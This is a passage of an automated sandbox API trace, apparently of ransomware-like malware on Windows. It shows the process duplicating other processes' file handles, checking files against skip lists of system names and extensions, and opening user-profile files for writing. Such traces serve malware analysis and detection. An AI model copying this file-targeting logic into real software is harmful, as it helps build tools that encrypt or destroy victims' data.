| out: lpThreadId=0x0) returned 0x1e4 [0163.566] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.567] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.567] CloseHandle (hObject=0x1e4) returned 1 [0163.567] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.567] CloseHandle (hObject=0x194) returned 1 [0163.567] CloseHandle (hObject=0x1e8) returned 1 [0163.567] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0163.567] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.568] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x102 [0163.824] TerminateThread (hThread=0x1e4, dwExitCode=0x0) returned 1 [0163.825] CloseHandle (hObject=0x1e4) returned 1 [0163.825] CloseHandle (hObject=0x194) returned 1 [0163.825] CloseHandle (hObject=0x1e8) returned 1 [0163.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0163.825] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.825] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.826] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.826] CloseHandle (hObject=0x1e4) returned 1 [0163.826] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.826] CloseHandle (hObject=0x194) returned 1 [0163.827] CloseHandle (hObject=0x1e8) returned 1 [0163.827] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0163.827] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.828] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.828] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.829] CloseHandle (hObject=0x1e4) returned 1 [0163.829] CloseHandle (hObject=0x194) returned 1 [0163.829] CloseHandle (hObject=0x1e8) returned 1 [0163.829] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0163.829] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.830] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.830] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.831] CloseHandle (hObject=0x1e4) returned 1 [0163.831] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.831] CloseHandle (hObject=0x194) returned 1 [0163.831] CloseHandle (hObject=0x1e8) returned 1 [0163.831] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0163.831] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.832] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.832] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.832] CloseHandle (hObject=0x1e4) returned 1 [0163.833] CloseHandle (hObject=0x194) returned 1 [0163.833] CloseHandle (hObject=0x1e8) returned 1 [0163.833] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0163.833] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.833] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.834] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.834] CloseHandle (hObject=0x1e4) returned 1 [0163.834] _wcsicmp (_Str1="\\My", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.834] CloseHandle (hObject=0x194) returned 1 [0163.835] CloseHandle (hObject=0x1e8) returned 1 [0163.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0163.835] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.835] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.836] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.836] CloseHandle (hObject=0x1e4) returned 1 [0163.836] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.836] CloseHandle (hObject=0x194) returned 1 [0163.836] CloseHandle (hObject=0x1e8) returned 1 [0163.836] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0163.837] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.837] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.838] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.838] CloseHandle (hObject=0x1e4) returned 1 [0163.838] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.838] CloseHandle (hObject=0x194) returned 1 [0163.838] CloseHandle (hObject=0x1e8) returned 1 [0163.839] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0163.839] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.839] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.840] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.840] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.840] CloseHandle (hObject=0x1e4) returned 1 [0163.840] CloseHandle (hObject=0x194) returned 1 [0163.841] CloseHandle (hObject=0x1e8) returned 1 [0163.841] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0163.841] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.841] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.842] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.845] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.845] CloseHandle (hObject=0x1e4) returned 1 [0163.845] _wcsicmp (_Str1="\\radarrs.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0163.845] CloseHandle (hObject=0x194) returned 1 [0163.845] CloseHandle (hObject=0x1e8) returned 1 [0163.845] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0163.845] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x120, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.846] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.847] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.847] CloseHandle (hObject=0x1e4) returned 1 [0163.847] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.847] CloseHandle (hObject=0x194) returned 1 [0163.847] CloseHandle (hObject=0x1e8) returned 1 [0163.847] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0163.847] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.848] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.849] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.849] CloseHandle (hObject=0x1e4) returned 1 [0163.849] CloseHandle (hObject=0x194) returned 1 [0163.849] CloseHandle (hObject=0x1e8) returned 1 [0163.849] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0163.849] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.849] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.850] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.851] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.851] CloseHandle (hObject=0x1e4) returned 1 [0163.851] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.851] CloseHandle (hObject=0x194) returned 1 [0163.851] CloseHandle (hObject=0x1e8) returned 1 [0163.851] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0163.851] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.854] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.856] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.857] CloseHandle (hObject=0x1e4) returned 1 [0163.857] CloseHandle (hObject=0x194) returned 1 [0163.857] CloseHandle (hObject=0x1e8) returned 1 [0163.857] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x210e20) returned 1 [0163.857] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0163.857] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0163.859] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0163.859] _wcsicmp (_Str1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", _Str2="README.c06622a1.TXT") returned -4 [0163.859] wcsstr (_Str="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", _SubStr="README") returned 0x0 [0163.859] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0163.859] wcslen (_String="autorun.inf") returned 0xb [0163.859] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0163.859] wcslen (_String="boot.ini") returned 0x8 [0163.859] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0163.859] wcslen (_String="bootfont.bin") returned 0xc [0163.859] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0163.859] wcslen (_String="bootsect.bak") returned 0xc [0163.859] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0163.859] wcslen (_String="desktop.ini") returned 0xb [0163.859] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0163.859] wcslen (_String="iconcache.db") returned 0xc [0163.859] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0163.859] wcslen (_String="ntldr") returned 0x5 [0163.859] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -123 [0163.859] wcslen (_String="ntuser.dat") returned 0xa [0163.859] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -77 [0163.859] wcslen (_String="ntuser.dat.log") returned 0xe [0163.859] _wcsicmp (_Str1="ntuser.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.859] wcslen (_String="ntuser.ini") returned 0xa [0163.859] _wcsicmp (_Str1="thumbs.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0163.859] wcslen (_String="thumbs.db") returned 0x9 [0163.859] _wcsicmp (_Str1="386", _Str2="regtrans-ms") returned -63 [0163.859] wcslen (_String="386") returned 0x3 [0163.859] _wcsicmp (_Str1="adv", _Str2="regtrans-ms") returned -17 [0163.859] wcslen (_String="adv") returned 0x3 [0163.859] _wcsicmp (_Str1="ani", _Str2="regtrans-ms") returned -17 [0163.859] wcslen (_String="ani") returned 0x3 [0163.859] _wcsicmp (_Str1="bat", _Str2="regtrans-ms") returned -16 [0163.859] wcslen (_String="bat") returned 0x3 [0163.859] _wcsicmp (_Str1="bin", _Str2="regtrans-ms") returned -16 [0163.859] wcslen (_String="bin") returned 0x3 [0163.860] _wcsicmp (_Str1="cab", _Str2="regtrans-ms") returned -15 [0163.860] wcslen (_String="cab") returned 0x3 [0163.860] _wcsicmp (_Str1="cmd", _Str2="regtrans-ms") returned -15 [0163.860] wcslen (_String="cmd") returned 0x3 [0163.860] _wcsicmp (_Str1="com", _Str2="regtrans-ms") returned -15 [0163.860] wcslen (_String="com") returned 0x3 [0163.860] _wcsicmp (_Str1="cpl", _Str2="regtrans-ms") returned -15 [0163.860] wcslen (_String="cpl") returned 0x3 [0163.860] _wcsicmp (_Str1="cur", _Str2="regtrans-ms") returned -15 [0163.860] wcslen (_String="cur") returned 0x3 [0163.860] _wcsicmp (_Str1="deskthemepack", _Str2="regtrans-ms") returned -14 [0163.860] wcslen (_String="deskthemepack") returned 0xd [0163.860] _wcsicmp (_Str1="diagcab", _Str2="regtrans-ms") returned -14 [0163.860] wcslen (_String="diagcab") returned 0x7 [0163.860] _wcsicmp (_Str1="diagcfg", _Str2="regtrans-ms") returned -14 [0163.860] wcslen (_String="diagcfg") returned 0x7 [0163.860] _wcsicmp (_Str1="diagpkg", _Str2="regtrans-ms") returned -14 [0163.860] wcslen (_String="diagpkg") returned 0x7 [0163.860] _wcsicmp (_Str1="dll", _Str2="regtrans-ms") returned -14 [0163.860] wcslen (_String="dll") returned 0x3 [0163.860] _wcsicmp (_Str1="drv", _Str2="regtrans-ms") returned -14 [0163.860] wcslen (_String="drv") returned 0x3 [0163.860] _wcsicmp (_Str1="exe", _Str2="regtrans-ms") returned -13 [0163.860] wcslen (_String="exe") returned 0x3 [0163.860] _wcsicmp (_Str1="hlp", _Str2="regtrans-ms") returned -10 [0163.860] wcslen (_String="hlp") returned 0x3 [0163.860] _wcsicmp (_Str1="icl", _Str2="regtrans-ms") returned -9 [0163.860] wcslen (_String="icl") returned 0x3 [0163.860] _wcsicmp (_Str1="icns", _Str2="regtrans-ms") returned -9 [0163.860] wcslen (_String="icns") returned 0x4 [0163.860] _wcsicmp (_Str1="ico", _Str2="regtrans-ms") returned -9 [0163.860] wcslen (_String="ico") returned 0x3 [0163.860] _wcsicmp (_Str1="ics", _Str2="regtrans-ms") returned -9 [0163.860] wcslen (_String="ics") returned 0x3 [0163.860] _wcsicmp (_Str1="idx", _Str2="regtrans-ms") returned -9 [0163.860] wcslen (_String="idx") returned 0x3 [0163.860] _wcsicmp (_Str1="ldf", _Str2="regtrans-ms") returned -6 [0163.860] wcslen (_String="ldf") returned 0x3 [0163.861] _wcsicmp (_Str1="lnk", _Str2="regtrans-ms") returned -6 [0163.861] wcslen (_String="lnk") returned 0x3 [0163.861] _wcsicmp (_Str1="mod", _Str2="regtrans-ms") returned -5 [0163.861] wcslen (_String="mod") returned 0x3 [0163.861] _wcsicmp (_Str1="mpa", _Str2="regtrans-ms") returned -5 [0163.861] wcslen (_String="mpa") returned 0x3 [0163.861] _wcsicmp (_Str1="msc", _Str2="regtrans-ms") returned -5 [0163.861] wcslen (_String="msc") returned 0x3 [0163.861] _wcsicmp (_Str1="msp", _Str2="regtrans-ms") returned -5 [0163.861] wcslen (_String="msp") returned 0x3 [0163.861] _wcsicmp (_Str1="msstyles", _Str2="regtrans-ms") returned -5 [0163.861] wcslen (_String="msstyles") returned 0x8 [0163.861] _wcsicmp (_Str1="msu", _Str2="regtrans-ms") returned -5 [0163.861] wcslen (_String="msu") returned 0x3 [0163.861] _wcsicmp (_Str1="nls", _Str2="regtrans-ms") returned -4 [0163.861] wcslen (_String="nls") returned 0x3 [0163.861] _wcsicmp (_Str1="nomedia", _Str2="regtrans-ms") returned -4 [0163.861] wcslen (_String="nomedia") returned 0x7 [0163.861] _wcsicmp (_Str1="ocx", _Str2="regtrans-ms") returned -3 [0163.861] wcslen (_String="ocx") returned 0x3 [0163.861] _wcsicmp (_Str1="prf", _Str2="regtrans-ms") returned -2 [0163.861] wcslen (_String="prf") returned 0x3 [0163.861] _wcsicmp (_Str1="ps1", _Str2="regtrans-ms") returned -2 [0163.861] wcslen (_String="ps1") returned 0x3 [0163.861] _wcsicmp (_Str1="rom", _Str2="regtrans-ms") returned 10 [0163.861] wcslen (_String="rom") returned 0x3 [0163.861] _wcsicmp (_Str1="rtp", _Str2="regtrans-ms") returned 15 [0163.861] wcslen (_String="rtp") returned 0x3 [0163.861] _wcsicmp (_Str1="scr", _Str2="regtrans-ms") returned 1 [0163.861] wcslen (_String="scr") returned 0x3 [0163.861] _wcsicmp (_Str1="shs", _Str2="regtrans-ms") returned 1 [0163.861] wcslen (_String="shs") returned 0x3 [0163.861] _wcsicmp (_Str1="spl", _Str2="regtrans-ms") returned 1 [0163.861] wcslen (_String="spl") returned 0x3 [0163.861] _wcsicmp (_Str1="sys", _Str2="regtrans-ms") returned 1 [0163.861] wcslen (_String="sys") returned 0x3 [0163.861] _wcsicmp (_Str1="theme", _Str2="regtrans-ms") returned 2 [0163.861] wcslen (_String="theme") returned 0x5 [0163.862] _wcsicmp (_Str1="themepack", _Str2="regtrans-ms") returned 2 [0163.862] wcslen (_String="themepack") returned 0x9 [0163.862] _wcsicmp (_Str1="wpx", _Str2="regtrans-ms") returned 5 [0163.862] wcslen (_String="wpx") returned 0x3 [0163.862] _wcsicmp (_Str1="lock", _Str2="regtrans-ms") returned -6 [0163.862] wcslen (_String="lock") returned 0x4 [0163.862] _wcsicmp (_Str1="key", _Str2="regtrans-ms") returned -7 [0163.862] wcslen (_String="key") returned 0x3 [0163.862] _wcsicmp (_Str1="hta", _Str2="regtrans-ms") returned -10 [0163.862] wcslen (_String="hta") returned 0x3 [0163.862] _wcsicmp (_Str1="msi", _Str2="regtrans-ms") returned -5 [0163.862] wcslen (_String="msi") returned 0x3 [0163.862] _wcsicmp (_Str1="pdb", _Str2="regtrans-ms") returned -2 [0163.862] wcslen (_String="pdb") returned 0x3 [0163.862] _wcsicmp (_Str1="sqlite", _Str2="regtrans-ms") returned 1 [0163.862] wcslen (_String="sqlite") returned 0x6 [0163.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0163.862] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0163.862] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0163.862] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0163.862] wcscpy (in: _Dest=0x1f8e5c, _Source="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: _Dest="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0163.862] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x80) returned 1 [0163.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0163.863] GetCurrentProcessId () returned 0xb58 [0163.863] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0163.863] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x208e38 [0163.863] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x208e38, Length=0x400, ResultLength=0x32ee30 | out: SystemInformation=0x208e38, ResultLength=0x32ee30*=0x274c4) returned 0xc0000004 [0163.864] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x208e38, Size=0x274c4) returned 0x3210048 [0163.865] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x274c4, 